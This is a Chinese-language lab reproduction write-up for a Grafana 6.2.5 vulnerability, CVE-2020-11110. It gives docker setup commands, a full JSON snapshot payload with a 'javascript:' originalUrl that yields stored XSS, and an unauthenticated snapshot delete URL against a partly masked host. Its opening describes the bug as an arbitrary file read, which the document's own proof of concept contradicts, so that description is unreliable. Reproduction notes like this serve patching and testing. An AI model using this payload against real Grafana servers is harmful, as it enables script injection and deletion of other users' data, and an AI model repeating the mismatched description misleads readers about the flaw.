Preface
Grafana是一個跨平台、開源的數據可視化網絡應用程序平台。用戶配置連接的數據源之后,Grafana可以在網絡瀏覽器里顯示數據圖表和警告。Grafana 存在未授權任意文件讀取漏洞,攻擊者在未經身份驗證的情況下可通過該漏洞讀取主機上的任意文件。
CVE編號:
CVE-2020-11110
影響范圍:
Grafana v6.2.5
Links
https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
復現記錄
測試環境部署
docker pull grafana/grafana:6.2.5 docker run -d -p 3000:3000 --name=grafana grafana/grafana:6.2.5
PoC 測試
payload =>
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
Stored-XSS
替換 url 中的 localhost,訪問快照地址,點擊鏈接🔗圖標。 Stored-XSS。
snapshot 快照刪除
訪問 deleteUrl:
http://103.210.xx.xx:3000/api/snapshots-delete/o3ITlrkiwgJexFmCJxr4gsNZ8QDcc0eQ
可以刪除 snapshot,這里算是個嚴重程度更高的漏洞。
修復方案
版本升級。
Refer
https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
以上!